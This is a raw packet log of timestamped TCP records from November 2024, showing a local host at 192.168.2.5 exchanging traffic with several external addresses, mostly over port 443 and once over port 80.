Nov 12, 2024 00:06:23.119390011 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.119424105 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.119740963 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.119750023 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.120119095 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.120136976 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.120780945 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.120790005 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.121494055 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.128093958 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.128099918 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.128545046 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.128550053 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.132159948 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.132175922 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.132472038 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.134911060 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.134972095 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.134998083 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.207324982 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.208101034 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.208177090 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.208209038 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.208223104 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.208228111 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.208276987 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.208307981 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.208317041 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.210297108 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.210360050 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.210402966 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.217729092 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.218034983 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.218091965 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.218628883 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.218650103 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.218662024 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.218668938 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.219043970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:23.219105959 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:23.219954014 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.219964981 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.219978094 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.219981909 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.220601082 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.220606089 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.221801996 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.221820116 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.221831083 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.221837044 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.223872900 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.223887920 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.223901033 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.223906994 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.231005907 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:23.231175900 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:23.231183052 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:23.232142925 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:23.232186079 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:23.233876944 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:23.233925104 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:23.244400024 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.244424105 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.244553089 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.246679068 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.246690035 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.251791954 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.251817942 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.252113104 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.253463030 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.253472090 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.255861044 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.255887985 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.255935907 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.261462927 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.261472940 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.261619091 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.261905909 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.261915922 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.262559891 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.262573004 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.263509989 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.263516903 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.263564110 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.263719082 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.263726950 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.413393021 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:23.413414955 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:23.492796898 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.569195986 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.569242954 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.605057955 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:23.622033119 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.622051954 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.758306980 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.768170118 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.793327093 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.794222116 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.795109987 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.823757887 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.823775053 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.831244946 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.831267118 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.833705902 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.833710909 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.834112883 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.834145069 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.835262060 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.835273981 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.836918116 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:23.836965084 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:23.837122917 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:23.837605000 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:23.837642908 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:23.837723970 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:23.838099003 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:23.838109016 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:23.838232040 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:23.838248014 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:23.838347912 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.838371038 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.838871002 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.838876963 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.839200974 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.839209080 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.839622021 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.839626074 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.839932919 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.839941025 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.840522051 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.840524912 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.869415998 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.869447947 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.869548082 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.871480942 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:23.871491909 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:23.922440052 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.923549891 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.923639059 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.925791979 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.926259041 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.926466942 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.927625895 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.927723885 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.927777052 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.928278923 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.928558111 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.928611994 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.929017067 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.929626942 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.929701090 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.947302103 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:23.947344065 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:23.947463989 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:23.947981119 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:23.947994947 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:23.949017048 CET	49782	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.949024916 CET	443	49782	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.950341940 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.950354099 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.950364113 CET	49781	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.950368881 CET	443	49781	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.951035023 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.951051950 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.951064110 CET	49779	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.951069117 CET	443	49779	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.951102018 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.951102018 CET	49780	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.951108932 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.951117039 CET	443	49780	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.952666044 CET	49783	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.952672005 CET	443	49783	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.972795963 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.972811937 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.972886086 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.974450111 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.974459887 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.977845907 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.977876902 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.977971077 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.978313923 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.978327036 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.980350018 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.980356932 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.980443001 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.986551046 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.986560106 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.986706972 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.989238977 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.989249945 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.989408016 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.989418030 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.993999958 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.994036913 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.994106054 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.994311094 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.994324923 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.017065048 CET	49793	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.017107010 CET	443	49793	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.017158031 CET	49793	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.018095016 CET	49793	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.018107891 CET	443	49793	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.075737953 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:24.080569029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:24.269788027 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.269983053 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.269995928 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.270193100 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.271085024 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.271091938 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.271106958 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.271140099 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.272280931 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.272337914 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.273802996 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.273878098 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.274104118 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.274110079 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.275207996 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.275279999 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.275403023 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.275412083 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.369326115 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.372054100 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.372308016 CET	49784	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.372327089 CET	443	49784	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.373102903 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.373960972 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.374095917 CET	49785	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.374105930 CET	443	49785	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.459393024 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.462111950 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:24.462141991 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.463139057 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.463196993 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:24.466048002 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:24.466125011 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.466360092 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:24.466376066 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.548686028 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.548832893 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.549211025 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.549495935 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.549526930 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.550821066 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.551208973 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.551213980 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.551629066 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.551667929 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.552432060 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.552443027 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.552711964 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.552725077 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.553620100 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.553631067 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.553649902 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.553689003 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.554184914 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.554195881 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.556205034 CET	49703	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:06:24.558537960 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.558908939 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.558939934 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.559374094 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.559382915 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.561786890 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.562005997 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:24.562318087 CET	49787	443	192.168.2.5	162.159.61.3
Nov 12, 2024 00:06:24.562336922 CET	443	49787	162.159.61.3	192.168.2.5
Nov 12, 2024 00:06:24.623805046 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.623893023 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.641731977 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.641870975 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.641926050 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.643229961 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.643244982 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.643264055 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.643558979 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.643965960 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.643980980 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.644030094 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.644051075 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.644109964 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.644175053 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.644196033 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.644234896 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.644263029 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.644531012 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.644582033 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.646140099 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.646141052 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.646141052 CET	49789	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.646157026 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.646157026 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.646166086 CET	443	49789	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.646173954 CET	49792	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.646183014 CET	443	49792	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.648758888 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.648763895 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.648775101 CET	49791	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.648780107 CET	443	49791	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.649540901 CET	49788	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.649569988 CET	443	49788	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.652357101 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.653044939 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.653112888 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.657938004 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.657963037 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.657977104 CET	49790	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.657984018 CET	443	49790	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.679091930 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.679131031 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.679198980 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.679589033 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.679620981 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.679692984 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.679975033 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.679986000 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.680171013 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.680188894 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.692055941 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.692112923 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.692301035 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.713037014 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.713068962 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.713321924 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.714169979 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.714234114 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.714339972 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.714605093 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.714621067 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.726694107 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.726705074 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.726794004 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.726835966 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.726895094 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.726933956 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.726936102 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.727099895 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.727112055 CET	443	49804	13.107.246.45	192.168.2.5
